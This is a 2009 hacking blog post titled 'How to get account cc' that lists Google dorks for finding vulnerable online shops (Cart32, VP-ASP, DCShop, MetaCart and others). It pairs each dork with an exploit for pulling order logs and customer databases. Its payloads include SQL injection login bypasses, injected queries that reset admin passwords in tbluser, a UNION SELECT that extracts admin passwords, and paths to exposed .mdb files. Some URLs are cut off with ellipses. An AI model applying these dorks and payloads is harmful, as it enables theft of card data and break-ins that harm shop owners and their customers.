Tuesday, 10.17.2017, 0:51 AM
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

How to get account cc
google dork :--> allinurl:/cart32.exe/
target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-...xe/NoItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier, with the format http://www.xxxxx.com/cart32/

google dork :--> inurl:"/cart.php?m="
target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or"="
Password : 'or"="

google dork :--> allinurlroddetail.asp?prod
target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb

google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.com/cgi-local/shop...dd=action&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/sh...late=order.log

google dork :--> allinurl: Lobby.asp
target looks like :--> www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb

google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
Keyword=&category=5); update tbluser set fldpassword='' where
Keyword=&category=3); update tbluser set fldaccess='1' where
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where

login page: http://xxxxxxx/vpasp/shopadmin.asp

google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/vpasp/shopdisplay...asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplaypro ... ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
after finding user and pass go to login page:

google dork :--> allinurl:/shopadmin.asp
target looks like :--> www.xxxxxx.com/shopadmin.asp
user : 'or'1
pass : 'or'1

google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.com/cgi-bin/store/...short_blue.htm
exploit :--> ../admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.com/cgi-bin/store...iles/order.log

google.com:--> allinurl:/metacart/
target looks like :--> www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
google.com:--> allinurl:/DCShop/
target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt


google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.

google.com:--> allinurl:/commercesql/
target looks like :--> www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.com/cgi-bin/commer... ... in_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.com/cgi-bin/commer...in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com/cgi-bin/commerc...iles/order.log

google.com:--> allinurl:/eshop/
target looks like :--> www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.com/.../cg-bin/e....base/order.mdb
after dl the db look at access for user and password !!

Source: Indonesian Newbie Hacker

Category: Hacking | Added by: neo-gabriel (08.09.2009)
Views: 22031 | Comments: 1 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
My Friends

Copyright Neo-Gabriel © 2017